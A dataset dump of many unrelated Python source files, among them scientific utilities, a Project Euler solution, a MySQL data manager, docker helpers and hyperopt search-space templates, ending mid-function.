content
stringlengths
0
1.05M
origin
stringclasses
2 values
type
stringclasses
2 values
""" This module consists of functions to calculate the [equivalent latitude](https://journals.ametsoc.org/doi/citedby/10.1175/1520-0469%282003%29060%3C0287%3ATELADT%3E2.0.CO%3B2) and edge of a polar vortex using [Nash criteria](https://agupubs.onlinelibrary.wiley.com/doi/10.1029/96JD00066). ### Installation ``` pip install -U pyvortex ``` install the latest version using ``` pip install git+https://github.com/pankajkarman/pyvortex.git ``` ### Usage `pyvortex` is easy to use. Just import: ```python import pyvortex as vr ``` #### Northern Hemisphere Instantiate the `PolarVortex` class using: ```python pol = PolarVortex(pv, uwind) ``` Get equivalent lqtitude for the provided vorticity data as: ```python eql = pol.get_eql() ``` If you want to get both equivalent latitude and Vortex edge, just use: ```python eql = pol.get_edge(min_eql=30) ``` #### Southern Hemisphere Flip pv and uwind along latitude dimension and multiply pv by -1. All other things will be the same. """ from .pyvortex import PolarVortex
nilq/baby-python
python
''' Problem 9 25 January 2002 A Pythagorean triplet is a set of three natural numbers, a < b < c, for which, a^2 + b^2 = c^2 For example, 3^2 + 4^2 = 9 + 16 = 25 = 5^2. There exists exactly one Pythagorean triplet for which a + b + c = 1000. Find the product abc. ---------------------------------------------------------- Created on 26.01.2012 @author: ahallmann ''' import unittest import timeit import math def is_pythagorean_triplet(a,b,c): return int(a*a) + int(b*b) == int(c*c) def solve(tripletSum): for a in range(1, 1000): for b in range(1, 1000): c = math.sqrt(a*a + b*b) #print "a = " + str(a) + " b = " + str(b) + " c = " + str(c) if a+b+c == tripletSum: return int(a*b*c) return None class Test(unittest.TestCase): def testSimple0(self): self.assertTrue(is_pythagorean_triplet(1,1,math.sqrt(2))) def testSimple1(self): self.assertTrue(is_pythagorean_triplet(3,4,5)) def testSimple2(self): self.assertFalse(is_pythagorean_triplet(3,4,6)) def test_answer(self): self.assertEqual(31875000, solve(1000)) # ----------------------------------------- def run(): return solve(1000) if __name__ == '__main__': unittest.main() if __name__ == '__main__': t = timeit.Timer("run()", "from __main__ import run") count = 1 print str(t.timeit(count)) + " seconds for " + str(count) + " runs"
nilq/baby-python
python
# from django_filters import Filter # Add your filters here
nilq/baby-python
python
import shap import numpy as np import cv2 class BetterImageMasker(shap.maskers.Image): def __call__(self, mask, x): if np.prod(x.shape) != np.prod(self.input_shape): raise Exception("The length of the image to be masked must match the shape given in the " + \ "ImageMasker contructor: "+" * ".join([str(i) for i in x.shape])+ \ " != "+" * ".join([str(i) for i in self.input_shape])) # unwrap single element lists (which are how single input models look in multi-input format) if isinstance(x, list) and len(x) == 1: x = x[0] # we preserve flattend inputs as flattened and full-shaped inputs as their original shape in_shape = x.shape if len(x.shape) > 1: x = x.ravel() # if mask is not given then we mask the whole image if mask is None: mask = np.zeros(np.prod(x.shape), dtype=np.bool) if isinstance(self.mask_value, str): if self.blur_kernel is not None: if self.last_xid != id(x): self._blur_value_cache = cv2.blur(x.reshape(self.input_shape), self.blur_kernel).ravel() self.last_xid = id(x) out = x.copy() out[~mask] = self._blur_value_cache[~mask] elif self.mask_value == "inpaint_telea": out = self.inpaint(x, ~mask, "INPAINT_TELEA") elif self.mask_value == "inpaint_ns": out = self.inpaint(x, ~mask, "INPAINT_NS") else: out = x.copy() out[~mask.flatten()] = self.mask_value[~mask.flatten()] return (out.reshape(1, *in_shape),)
nilq/baby-python
python
# Generated by Django 2.1.5 on 2019-01-05 14:44 import django.contrib.postgres.fields import django.core.validators from django.db import migrations, models import reader.validators class Migration(migrations.Migration): dependencies = [ ('reader', '0011_auto_20181001_1853'), ] operations = [ migrations.AlterField( model_name='article', name='uri', field=models.URLField(blank=True, max_length=2048), ), migrations.AlterField( model_name='board', name='name', field=models.CharField(max_length=100, verbose_name='name'), ), migrations.AlterField( model_name='board', name='tags', field=django.contrib.postgres.fields.ArrayField(base_field=models.CharField(max_length=40), blank=True, default=list, size=100, verbose_name='tags'), ), migrations.AlterField( model_name='feed', name='name', field=models.CharField(max_length=100, verbose_name='name'), ), migrations.AlterField( model_name='feed', name='uri', field=models.URLField(max_length=2048, unique=True, validators=[django.core.validators.URLValidator(schemes=['http', 'https']), reader.validators.http_port_validator], verbose_name='Feed address'), ), ]
nilq/baby-python
python
# -*- coding: utf-8 -*- import numpy as np from ipywidgets import interact from PIL import Image # [Preparation] # - check installation of jupyter and ipywidgets with # `pip list | grep ipywidgets` # - make the following jupyter extension enable # jupyter nbextension enable --py widgetsnbextension --sys-prefix def display_image_batch(batch,order_bgr=False, order_nchw=False, global_norm=False): # batch.shape = (N,C,H,W) N = len(batch) min_values = np.zeros(N, dtype=np.float32) max_values = np.ones(N, dtype=np.float32) * 255 normalize = False if isinstance(batch, np.ndarray) and np.issubdtype(batch.dtype, np.float): if global_norm: min_values[:] = batch.min() max_values[:] = batch.max() else: min_values[:] = np.min(batch.reshape(N,-1), axis=1) max_values[:] = np.max(batch.reshape(N,-1), axis=1) normalize = True def display_image(idx): img = batch[idx].copy() if normalize: min_value = min_values[idx] max_value = max_values[idx] if max_value > min_value: img = np.clip(255.0/(max_value-min_value) * (img-min_value),0,255).astype(np.uint8) else: img = np.clip(255.0*(img-min_value),0,255).astype(np.uint8) if img.ndim == 3: if order_nchw: # img.shape = [C,H,W] img = img.transpose(1,2,0) if img.shape[2] == 3 and order_bgr: img[...,[0,1,2]] = img[...,[2,1,0]] if img.shape[2] == 1: img = img[...,0] # convert [H,W,1] to [H,W] return Image.fromarray(img) interact(display_image, batch=batch, idx=(0, N-1,1)); #def switch_pylab_notebook(): # %pylab notebook # %pylab notebook # I don't know why but execution twice is fine for system #def switch_pylab_inline(): # %pylab inline
nilq/baby-python
python
i = 0 classe = [] continuar = '' while True: nome = str(input('Nome: ').strip()) nota1 = float(input('Nota 1: ').strip()) nota2 = float(input('Nota 2: ').strip()) classe.append([i, nome, nota1, nota2, (nota1 + nota2) / 2]) while True: continuar = str(input('Quer continuar? [S/N] ').strip()[0]) if continuar not in 'SsNn': print('\033[31mValor informado inválido!\033[m') else: break if continuar in 'Nn': break i += 1 print('-=' * 30) print(f'{"No.":<4}{"NOME":<10}{"MÉDIA":>8}') print('-' * 26) for c in classe: print(f'{c[0]:<4}{c[1]:<10}{c[4]:>8.1f}') print('-' * 40) while True: continuar = str(input('Mostrar notas de qual aluno? (999 interrompe): ')) if '999' in continuar: print('FINALIZANDO...') break for c in classe: if int(continuar) == c[0]: print(f'As notas de {c[1]} são [{c[2]}, {c[3]}]') print(' <<< VOLTE SEMPRE >>> ')
nilq/baby-python
python
# Individual image generator import sys HW_NUMBER = int(sys.argv[1]) Q_NUMBER = int(sys.argv[2]) HW_PATH = sys.argv[3] + "/body.tex" f = open(HW_PATH, 'r') content = [n for n in f.readlines() if (not n.startswith('%') and not n.startswith('\sol') and n.strip())] def index_containing_substring(the_list, substring): for i, s in enumerate(the_list): if substring in s: return i return -1 index_of_beginqunlist = index_containing_substring(content, 'begin{qunlist}') index_of_endqunlist = index_containing_substring(content, 'end{qunlist}') index_of_maketitle = index_containing_substring(content, 'maketitle') index_of_enddoc = index_containing_substring(content, 'end{document}') new_content = [] for i in range(index_of_beginqunlist): if i < index_of_maketitle: new_content.append(content[i]) # There may be extra empty lines, comments, etc in the qunlist section. # So we'll find the Q'th \input{q_ line. index_of_q_number = -1 # In theory it is (index_of_beginqunlist + Q_NUMBER) current_q = 0 for i in range(index_of_beginqunlist+1, index_of_endqunlist): if "\input{q_" in content[i]: current_q += 1 if current_q == Q_NUMBER: index_of_q_number = i break assert index_of_q_number != -1, "Can't find the given question number" new_content.append('\def\qcontributor#1{}') # Hack to disable contributor list from generating a large footer at the bottom new_content.append('\\pagestyle{empty}') # <-- doesn't seem to do anything/work? new_content.append(content[index_of_beginqunlist]) new_content.append('\setcounter{sparectr}{' + str(Q_NUMBER - 1) + '}') new_content.append(content[index_of_q_number]) new_content.append(content[index_of_endqunlist]) new_content.append(content[index_of_enddoc]) with open(HW_PATH, 'w+') as f2: for line in new_content: f2.write(line + "\n")
nilq/baby-python
python
from typing import Sequence, Union, Optional from typing_extensions import Literal from .transforms import CriteriaFn from .deform import deform_image_random from ..transforms import transforms class TransformRandomDeformation(transforms.TransformBatchWithCriteria): """ Transform an image using a random deformation field. Only 2D or 3D supported transformation. The gradient can be back-propagated through this transform. """ def __init__( self, control_points: Union[int, Sequence[int]] = 6, max_displacement: Optional[Union[float, Sequence[float]]] = 0.5, criteria_fn: Optional[CriteriaFn] = None, interpolation: Literal['linear', 'nearest'] = 'linear', padding_mode: Literal['zeros', 'border', 'reflection'] = 'zeros', gaussian_filter_sigma: Optional[float] = 1.5, align_corners: bool = False): """ Args: control_points: the control points spread on the image at regularly spaced intervals with random `max_displacement` magnitude max_displacement: specify the maximum displacement of a control point. Range [-1..1]. If None, use the moving volume shape and number of control points to calculate appropriate small deformation field interpolation: the interpolation of the image with displacement field padding_mode: how to handle data outside the volume geometry align_corners: should be False. The (0, 0) is the center of a voxel gaussian_filter_sigma: if not None, smooth the deformation field using a gaussian filter. The smoothing is done in the control point space criteria_fn: a function to select applicable features in a batch """ self.interpolation = interpolation self.align_corners = align_corners self.max_displacement = max_displacement self.control_points = control_points self.padding_mode = padding_mode self.gaussian_filter_sigma = gaussian_filter_sigma if criteria_fn is None: criteria_fn = transforms.criteria_is_array_4_or_above self.criteria_fn = criteria_fn super().__init__( criteria_fn=criteria_fn, transform_fn=self._transform ) def _transform(self, features_names, batch): data_shape = batch[features_names[0]].shape data_dim = len(data_shape) - 2 # remove `N` and `C` components assert data_dim == 2 or data_dim == 3, f'only 2D or 3D data handled. Got={data_dim}' for name in features_names[1:]: # make sure the data is correct: we must have the same dimensions (except `C`) # for all the images feature = batch[name] feature_shape = feature.shape[2:] assert feature_shape == data_shape[2:], f'joint features transformed must have the same dimension. ' \ f'Got={feature_shape}, expected={data_shape[2:]}' assert feature.shape[0] == data_shape[0] images = [batch[name] for name in features_names] deformed_images = deform_image_random( images, control_points=self.control_points, max_displacement=self.max_displacement, interpolation=self.interpolation, padding_mode=self.padding_mode, align_corners=self.align_corners, gaussian_filter_sigma=self.gaussian_filter_sigma ) # copy features that are not images new_batch = {name: value for name, value in zip(features_names, deformed_images)} for name, value in batch.items(): if name not in new_batch: new_batch[name] = value return new_batch
nilq/baby-python
python
import stk from .utilities import is_equivalent_atom def test_repr(atom): """ Test :meth:`.Atom.__repr__`. Parameters ---------- atom : :class:`.Atom` The atom, whose representation should be tested. Returns ------- None : :class:`NoneType` """ other = eval(repr(atom), dict(stk.__dict__)) is_equivalent_atom(other, atom)
nilq/baby-python
python
##################################################################################### # Manager class of Meal which deals with Meal saving / loading / setting / deleting # ##################################################################################### from Manager import Manager from Models.Meal import Meal import mysql.connector as mariadb import pymysql import sys class MealManager(Manager): def __init__(self, usr="toor", psswd="toor"): self.table = "Meal" Manager.__init__(self, self.table, usr, psswd) def db_create(self, name): """ Create a meal in the database from a name :param name : the name of the meal :return: the Meal object if successfully created else, False """ connect = self.get_connector() cursor = connect.cursor(prepared=True) try: cursor.execute("INSERT INTO `{}` (name_meal) VALUES (?)".format(self.table), (name,)) connect.commit() except mariadb.errors.IntegrityError: sys.stderr.write("The meal name {} may already exist.".format(name)) return False except mariadb.Error: sys.stderr.write("An error occurred with the meal creating.") return False id = self.get_current_id() - 1 connect.close() return Meal(id, name) def db_create_from_obj(self, meal): """ Create a recipe in the database from a Recipe object :param meal : the Recipe object to create in database :return: True if success else False """ self.check_managed(meal) connect = self.get_connector() cursor = connect.cursor(prepared=True) try: cursor.execute("INSERT INTO `{}` (id_meal, name_meal) VALUES (?, ?)".format(self.table), (meal.get_id_meal(), meal.get_name_meal())) connect.commit() connect.close() except mariadb.errors.IntegrityError: sys.stderr.write("The meal name {} or the meal id {} may already exist.".format(meal.get_name(), str(meal.get_id()))) return False except mariadb.Error: sys.stderr.write("An error occurred with the meal creating.") return False return True def db_delete(self, id=None, name=None): """ Delete a meal by its name or its id from the database (soft delete) :param ? id : the id of the meal to delete :param ? name : the name of the meal to delete :return: False if no parameters given or if an error occurs else True """ if name is None and id is None: sys.stderr.write("No name or id mentioned.") return False else: try: connect = self.get_connector() cursor = connect.cursor(prepared=True) if id is not None: cursor.execute("UPDATE `{}` SET deleted = 1 WHERE id_meal = %s".format(self.table), (id,)) else: cursor.execute("UPDATE `{}` SET deleted = 1 WHERE name_meal = %s".format(self.table), (name,)) connect.commit() connect.close() except mariadb.Error: sys.stderr.write("An error occurred with the meal deleting.") return False return True def db_save(self, meal): """ Save a Meal object into database :param meal : the object to save :return: False an error occurred else True """ self.check_managed(meal) try: connect = self.get_connector() cursor = connect.cursor() cursor.execute('UPDATE `{}` SET `name_meal` = "{}" WHERE `id_meal` = "{}"'.format(self.table, meal.get_name_meal(), str(meal.get_id_meal()))) connect.commit() connect.close() except mariadb.Error: sys.stderr.write("An error occured with the meal saving.") return False return True def db_load(self, id=None, name=None): """ From an id or a name, load a Meal object from the database :param id : the id of the meal to load :param name : the name of the meal to load :return: the Meal object loaded, None if not in database """ if name is None and id is None: sys.stderr.write("No name or id mentioned.") return False else: connect = self.get_connector() cursor = connect.cursor(dictionary=True) if id is not None: cursor.execute("SELECT Meal.id_meal, Meal.name_meal, Ingredient.id_ingredient, Ingredient.name_ingredient, " "Recipe.quantity, Meal.deleted FROM `{}` INNER JOIN Recipe ON Meal.id_meal = Recipe.id_meal INNER JOIN " "Ingredient ON Recipe.id_ingredient = Ingredient.id_ingredient WHERE Meal.id_meal = {} " "AND Meal.deleted = 0".format(self.table, pymysql.escape_string(str(id)))) else: cursor.execute("SELECT Meal.id_meal, Meal.name_meal, Recipe.id_ingredient, Ingredient.name_ingredient, " "Recipe.quantity, Meal.deleted FROM `{}` INNER JOIN Recipe ON Meal.id_meal = Recipe.id_meal INNER JOIN " "Ingredient ON Recipe.id_ingredient = Ingredient.id_ingredient WHERE Meal.name_meal = {} " "AND Meal.deleted = 0".format(self.table, pymysql.escape_string(name))) answ = cursor.fetchall() connect.close() return Meal().init(answ) if answ else None def get_listview_info(self): """ Returns all the information from Meal database (deleted = 0) formatted to display on ListView widget (id, name) :return: answ : The result of the query """ connect = self.get_connector() cursor = connect.cursor() cursor.execute('SELECT id_meal, name_meal FROM {} WHERE Meal.deleted = 0'.format(self.table)) answ = cursor.fetchall() connect.close() return answ def get_current_id(self): """ Returns the current id, usefull to create associated objects in conformity with the database values and constraints :return: the current assignable id """ connect = self.get_connector() cursor = connect.cursor() cursor.execute('SELECT MAX(id_meal) FROM {}'.format(self.table)) connect.close() return int(cursor.fetchall()[0][0]) + 1 @staticmethod def check_managed(item): """ Check if the parameter is from the type of the managed item, if not raise ValueError :param item : the item to verify """ if not isinstance(item, Meal): raise ValueError('The parameter must be a Meal instance.')
nilq/baby-python
python
#!/usr/bin/env python # coding: utf-8 # In[1]: def gpa_cal(scores : str,base:int = 10) -> float: """Return float Grade Point Average for anyy base with default as 10 A- and B+ aree treated as similar, althouh functionality can be modified""" gpa_final = 0.0 scores = scores.upper() # To allow for mistypes in scores entered gpa_final += scores.count('+') # increments score by 1 for each plus gpa_final -= scores.count('-') # decrements score by 1 for each minus # Remove + and minus from string scores = "".join(scores.split('+')) # Splits across + and joins scores string again scores = "".join(scores.split('-')) # Splits across - and joins scores string again if len(scores) == 0: raise ValueError("Invalid Grades entered as input") grading = {} # dict stores value alloted to each grade for value in range(0,base): grading[chr(65+value)] = base-value-1 for grade in scores: try: gpa_final += grading[grade] except KeyError as e: raise KeyError("Incorrect Symbol entered {!r}".format(e)) gpa_final = gpa_final/len(scores) print("if you want to convert GPA from 10 scale to scale of 3 or 4 or 5 - Press 1 else Press 0") inp = int(input()) if inp==1: print("To convert base convert GPA from 10 scale to scale of 3 - Press 3") print("To convert base convert GPA from 10 scale to scale of 4 - Press 4") print("To convert base convert GPA from 10 scale to scale of 5 - Press 5") scaling=int(input()) if scaling==3: gpa_final = (gpa_final/10)*3 elif scaling==4: gpa_final = (gpa_final/10)*4 else: gpa_final = (gpa_final/10)*5 return gpa_final if __name__ == "__main__": print(gpa_cal('AAA+BCADE',10)) # Test case in issue # In[ ]:
nilq/baby-python
python
from docker import DockerClient from aavm.utils.progress_bar import ProgressBar from cpk.types import Machine, DockerImageName ALL_STATUSES = [ "created", "restarting", "running", "removing", "paused", "exited", "dead" ] STOPPED_STATUSES = [ "created", "exited", "dead" ] UNSTABLE_STATUSES = [ "restarting", "removing" ] RUNNING_STATUSES = [ "running", "paused" ] # noinspection DuplicatedCode def pull_image(machine: Machine, image: str, progress: bool = True): client: DockerClient = machine.get_client() layers = set() pulled = set() pbar = ProgressBar() if progress else None for line in client.api.pull(image, stream=True, decode=True): if "id" not in line or "status" not in line: continue layer_id = line["id"] layers.add(layer_id) if line["status"] in ["Already exists", "Pull complete"]: pulled.add(layer_id) # update progress bar if progress: percentage = max(0.0, min(1.0, len(pulled) / max(1.0, len(layers)))) * 100.0 pbar.update(percentage) if progress: pbar.done() def remove_image(machine: Machine, image: str): client: DockerClient = machine.get_client() client.images.remove(image) def merge_container_configs(*args) -> dict: out = {} for arg in args: assert isinstance(arg, dict) for k, v in arg.items(): if k not in out: out[k] = v else: if not isinstance(arg[k], type(out[k])): raise ValueError(f"Type clash '{type(out[k])}' !== '{type(arg[k])}' " f"for key '{k}'.") if isinstance(out[k], list): out[k].extend(arg[k]) elif isinstance(out[k], dict): out[k].update(arg[k]) else: out[k] = arg[k] return out def sanitize_image_name(image: str) -> str: return DockerImageName.from_image_name(image).compile(allow_defaults=True)
nilq/baby-python
python
"""Hyperopt templates for different models""" # forked from hyperopt/hyperopt-sklearn from functools import partial import numpy as np from hyperopt import hp from hyperopt.pyll import scope import sklearn.discriminant_analysis import sklearn.ensemble import sklearn.feature_extraction.text import sklearn.preprocessing import sklearn.svm import sklearn.tree # Optional dependencies try: import xgboost except ImportError: xgboost = None def default_name_func(name): return name ############################## ##==== Global variables ====## ############################## _svm_default_cache_size = 512 ############################################### ##==== Various hyperparameter generators ====## ############################################### def hp_bool(name): return hp.choice(name, [False, True]) def _svm_gamma(name, n_features=1): '''Generator of default gamma values for SVMs. This setting is based on the following rationales: 1. The gamma hyperparameter is basically an amplifier for the original dot product or l2 norm. 2. The original dot product or l2 norm shall be normalized by the number of features first. ''' # -- making these non-conditional variables # probably helps the GP algorithm generalize # assert n_features >= 1 return hp.loguniform(name, np.log(1. / n_features * 1e-3), np.log(1. / n_features * 1e3)) def _svm_degree(name): return hp.quniform(name, 1.5, 6.5, 1) def _svm_max_iter(name): return hp.qloguniform(name, np.log(1e7), np.log(1e9), 1) def _svm_C(name): return hp.loguniform(name, np.log(1e-5), np.log(1e5)) def _svm_tol(name): return hp.loguniform(name, np.log(1e-5), np.log(1e-2)) def _svm_int_scaling(name): return hp.loguniform(name, np.log(1e-1), np.log(1e1)) def _svm_epsilon(name): return hp.loguniform(name, np.log(1e-3), np.log(1e3)) def _svm_loss_penalty_dual(name): """ The combination of penalty='l1' and loss='hinge' is not supported penalty='l2' and loss='hinge' is only supported when dual='true' penalty='l1' is only supported when dual='false'. """ return hp.choice( name, [('hinge', 'l2', True), ('squared_hinge', 'l2', True), ('squared_hinge', 'l1', False), ('squared_hinge', 'l2', False)]) def _knn_metric_p(name, sparse_data=False, metric=None, p=None): if sparse_data: return ('euclidean', 2) elif metric == 'euclidean': return (metric, 2) elif metric == 'manhattan': return (metric, 1) elif metric == 'chebyshev': return (metric, 0) elif metric == 'minkowski': assert p is not None return (metric, p) elif metric is None: return hp.pchoice(name, [ (0.55, ('euclidean', 2)), (0.15, ('manhattan', 1)), (0.15, ('chebyshev', 0)), (0.15, ('minkowski', _knn_p(name + '.p'))), ]) else: return (metric, p) # undefined, simply return user input. def _knn_p(name): return hp.quniform(name, 2.5, 5.5, 1) def _knn_neighbors(name): return scope.int(hp.qloguniform(name, np.log(0.5), np.log(50.5), 1)) def _knn_weights(name): return hp.choice(name, ['uniform', 'distance']) def _trees_n_estimators(name): return scope.int(hp.qloguniform(name, np.log(9.5), np.log(3000.5), 1)) def _trees_criterion(name): return hp.choice(name, ['gini', 'entropy']) def _trees_max_features(name): return hp.pchoice( name, [ (0.2, 'sqrt'), # most common choice. (0.1, 'log2'), # less common choice. (0.1, None), # all features, less common choice. (0.6, hp.uniform(name + '.frac', 0., 1.)) ]) def _trees_max_depth(name): return hp.pchoice( name, [ (0.7, None), # most common choice. # Try some shallow trees. (0.1, 2), (0.1, 3), (0.1, 4), ]) def _trees_min_samples_split(name): return 2 def _trees_min_samples_leaf(name): return hp.choice( name, [ 1, # most common choice. scope.int( hp.qloguniform(name + '.gt1', np.log(1.5), np.log(50.5), 1)) ]) def _trees_bootstrap(name): return hp.choice(name, [True, False]) def _boosting_n_estimators(name): return scope.int(hp.qloguniform(name, np.log(10.5), np.log(1000.5), 1)) def _ada_boost_learning_rate(name): return hp.lognormal(name, np.log(0.01), np.log(10.0)) def _ada_boost_loss(name): return hp.choice(name, ['linear', 'square', 'exponential']) def _ada_boost_algo(name): return hp.choice(name, ['SAMME', 'SAMME.R']) def _grad_boosting_reg_loss_alpha(name): return hp.choice(name, [('ls', 0.9), ('lad', 0.9), ('huber', hp.uniform(name + '.alpha', 0.85, 0.95)), ('quantile', 0.5)]) def _grad_boosting_clf_loss(name): return hp.choice(name, ['deviance', 'exponential']) def _grad_boosting_learning_rate(name): return hp.lognormal(name, np.log(0.01), np.log(10.0)) def _grad_boosting_subsample(name): return hp.pchoice( name, [ (0.2, 1.0), # default choice. (0.8, hp.uniform(name + '.sgb', 0.5, 1.0) ) # stochastic grad boosting. ]) def _sgd_penalty(name): return hp.pchoice(name, [(0.40, 'l2'), (0.35, 'l1'), (0.25, 'elasticnet')]) def _sgd_alpha(name): return hp.loguniform(name, np.log(1e-6), np.log(1e-1)) def _sgd_l1_ratio(name): return hp.uniform(name, 0, 1) def _sgd_epsilon(name): return hp.loguniform(name, np.log(1e-7), np.log(1)) def _sgdc_learning_rate(name): return hp.pchoice(name, [(0.50, 'optimal'), (0.25, 'invscaling'), (0.25, 'constant')]) def _sgdr_learning_rate(name): return hp.pchoice(name, [(0.50, 'invscaling'), (0.25, 'optimal'), (0.25, 'constant')]) def _sgd_eta0(name): return hp.loguniform(name, np.log(1e-5), np.log(1e-1)) def _sgd_power_t(name): return hp.uniform(name, 0, 1) def _random_state(name, random_state): if random_state is None: return hp.randint(name, 5) else: return random_state def _class_weight(name): return hp.choice(name, [None, 'balanced']) ############################################## ##==== SVM hyperparameters search space ====## ############################################## def _svm_hp_space(kernel, n_features=1, C=None, gamma=None, coef0=None, degree=None, shrinking=None, tol=None, max_iter=None, verbose=False, cache_size=_svm_default_cache_size): '''Generate SVM hyperparamters search space ''' if kernel in ['linear', 'rbf', 'sigmoid']: degree_ = 1 else: degree_ = (_svm_degree('degree') if degree is None else degree) if kernel in ['linear']: gamma_ = 'auto' else: gamma_ = (_svm_gamma('gamma', n_features=1) if gamma is None else gamma) gamma_ /= n_features # make gamma independent of n_features. if kernel in ['linear', 'rbf']: coef0_ = 0.0 elif coef0 is None: if kernel == 'poly': coef0_ = hp.pchoice( 'coef0', [(0.3, 0), (0.7, gamma_ * hp.uniform('coef0val', 0., 10.))]) elif kernel == 'sigmoid': coef0_ = hp.pchoice( 'coef0', [(0.3, 0), (0.7, gamma_ * hp.uniform('coef0val', -10., 10.))]) else: pass else: coef0_ = coef0 hp_space = dict( kernel=kernel, C=_svm_C('C') if C is None else C, gamma=gamma_, coef0=coef0_, degree=degree_, shrinking=(hp_bool('shrinking') if shrinking is None else shrinking), tol=_svm_tol('tol') if tol is None else tol, max_iter=(_svm_max_iter('maxiter') if max_iter is None else max_iter), verbose=verbose, cache_size=cache_size) return hp_space def _svc_hp_space(random_state=None, probability=False): '''Generate SVC specific hyperparamters ''' hp_space = dict( random_state=_random_state('rstate', random_state), probability=probability) return hp_space def _svr_hp_space(epsilon=None): '''Generate SVR specific hyperparamters ''' hp_space = {} hp_space['epsilon'] = (_svm_epsilon('epsilon') if epsilon is None else epsilon) return hp_space ######################################### ##==== SVM classifier constructors ====## ######################################### def svc_kernel_hp_space(kernel, random_state=None, probability=False, **kwargs): """ Return a hyperparamter template that will construct a sklearn.svm.SVC model with a user specified kernel. Supported kernels: linear, rbf, poly and sigmoid """ hp_space = _svm_hp_space(kernel=kernel, **kwargs) hp_space.update(_svc_hp_space(random_state, probability)) return hp_space ######################################## ##==== SVM regressor constructors ====## ######################################## def svr_kernel_hp_space(kernel, epsilon=None, **kwargs): """ Return a hyperparamter template that will construct a sklearn.svm.SVR model with a user specified kernel. Supported kernels: linear, rbf, poly and sigmoid """ hp_space = _svm_hp_space(kernel=kernel, **kwargs) hp_space.update(_svr_hp_space(epsilon)) return hp_space ############################################## ##==== KNN hyperparameters search space ====## ############################################## def knn_hp_space(sparse_data=False, n_neighbors=None, weights=None, algorithm='auto', leaf_size=30, metric=None, p=None, metric_params=None, n_jobs=1): '''Generate KNN hyperparameters search space ''' metric_p = _knn_metric_p('metric_p', sparse_data, metric, p) hp_space = dict( n_neighbors=(_knn_neighbors('neighbors') if n_neighbors is None else n_neighbors), weights=(_knn_weights('weights') if weights is None else weights), algorithm=algorithm, leaf_size=leaf_size, metric=metric_p[0] if metric is None else metric, p=metric_p[1] if p is None else p, metric_params=metric_params, n_jobs=n_jobs) return hp_space #################################################################### ##==== Random forest/extra trees hyperparameters search space ====## #################################################################### def trees_hp_space(n_estimators=None, max_features=None, max_depth=None, min_samples_split=None, min_samples_leaf=None, bootstrap=None, oob_score=False, n_jobs=1, random_state=None, verbose=False): '''Generate trees ensemble hyperparameters search space ''' hp_space = dict( n_estimators=(_trees_n_estimators('n_estimators') if n_estimators is None else n_estimators), max_features=(_trees_max_features('max_features') if max_features is None else max_features), max_depth=(_trees_max_depth('max_depth') if max_depth is None else max_depth), min_samples_split=(_trees_min_samples_split( 'min_samples_split') if min_samples_split is None else min_samples_split), min_samples_leaf=(_trees_min_samples_leaf( 'min_samples_leaf') if min_samples_leaf is None else min_samples_leaf), bootstrap=(_trees_bootstrap('bootstrap') if bootstrap is None else bootstrap), oob_score=oob_score, n_jobs=n_jobs, random_state=_random_state('rstate', random_state), verbose=verbose, ) return hp_space ############################################################# ##==== Random forest classifier/regressor constructors ====## ############################################################# def random_forest_hp_space(criterion='gini', **kwargs): """"Return a hyperparameter template for RandomForest model. Parameters ---------- criterion: str 'gini' or 'entropy' and 'mse' for classification """ hp_space = trees_hp_space(**kwargs) hp_space['criterion'] = criterion return hp_space ################################################### ##==== AdaBoost hyperparameters search space ====## ################################################### def ada_boost_hp_space(base_estimator=None, n_estimators=None, learning_rate=None, random_state=None): '''Generate AdaBoost hyperparameters search space ''' hp_space = dict( base_estimator=base_estimator, n_estimators=(_boosting_n_estimators('n_estimators') if n_estimators is None else n_estimators), learning_rate=(_ada_boost_learning_rate('learning_rate') if learning_rate is None else learning_rate), random_state=_random_state('rstate', random_state)) return hp_space ########################################################### ##==== GradientBoosting hyperparameters search space ====## ########################################################### def grad_boosting_hp_space(learning_rate=None, n_estimators=None, subsample=None, min_samples_split=None, min_samples_leaf=None, max_depth=None, init=None, random_state=None, max_features=None, verbose=0, max_leaf_nodes=None, warm_start=False, presort='auto'): '''Generate GradientBoosting hyperparameters search space ''' hp_space = dict( learning_rate=(_grad_boosting_learning_rate('learning_rate') if learning_rate is None else learning_rate), n_estimators=(_boosting_n_estimators('n_estimators') if n_estimators is None else n_estimators), subsample=(_grad_boosting_subsample('subsample') if subsample is None else subsample), min_samples_split=(_trees_min_samples_split('min_samples_split') if min_samples_split is None else min_samples_split), min_samples_leaf=(_trees_min_samples_leaf('min_samples_leaf') if min_samples_leaf is None else min_samples_leaf), max_depth=(_trees_max_depth('max_depth') if max_depth is None else max_depth), init=init, random_state=_random_state('rstate', random_state), max_features=(_trees_max_features('max_features') if max_features is None else max_features), warm_start=warm_start, presort=presort) return hp_space ################################################### ##==== XGBoost hyperparameters search space ====## ################################################### def _xgboost_max_depth(name): return scope.int(hp.uniform(name, 1, 11)) def _xgboost_learning_rate(name): return hp.loguniform(name, np.log(0.0001), np.log(0.5)) - 0.0001 def _xgboost_n_estimators(name): return scope.int(hp.quniform(name, 100, 6000, 200)) def _xgboost_gamma(name): return hp.loguniform(name, np.log(0.0001), np.log(5)) - 0.0001 def _xgboost_min_child_weight(name): return scope.int(hp.loguniform(name, np.log(1), np.log(100))) def _xgboost_subsample(name): return hp.uniform(name, 0.5, 1) def _xgboost_colsample_bytree(name): return hp.uniform(name, 0.5, 1) def _xgboost_colsample_bylevel(name): return hp.uniform(name, 0.5, 1) def _xgboost_reg_alpha(name): return hp.loguniform(name, np.log(0.0001), np.log(1)) - 0.0001 def _xgboost_reg_lambda(name): return hp.loguniform(name, np.log(1), np.log(4)) def xgboost_hp_space(max_depth=None, learning_rate=None, n_estimators=None, gamma=None, min_child_weight=None, max_delta_step=0, subsample=None, colsample_bytree=None, colsample_bylevel=None, reg_alpha=None, reg_lambda=None, scale_pos_weight=1, base_score=0.5, random_state=None): '''Generate XGBoost hyperparameters search space ''' hp_space = dict( max_depth=(_xgboost_max_depth('max_depth') if max_depth is None else max_depth), learning_rate=(_xgboost_learning_rate('learning_rate') if learning_rate is None else learning_rate), n_estimators=(_xgboost_n_estimators('n_estimators') if n_estimators is None else n_estimators), gamma=(_xgboost_gamma('gamma') if gamma is None else gamma), min_child_weight=(_xgboost_min_child_weight( 'min_child_weight') if min_child_weight is None else min_child_weight), max_delta_step=max_delta_step, subsample=(_xgboost_subsample('subsample') if subsample is None else subsample), colsample_bytree=(_xgboost_colsample_bytree( 'colsample_bytree') if colsample_bytree is None else colsample_bytree), colsample_bylevel=(_xgboost_colsample_bylevel( 'colsample_bylevel') if colsample_bylevel is None 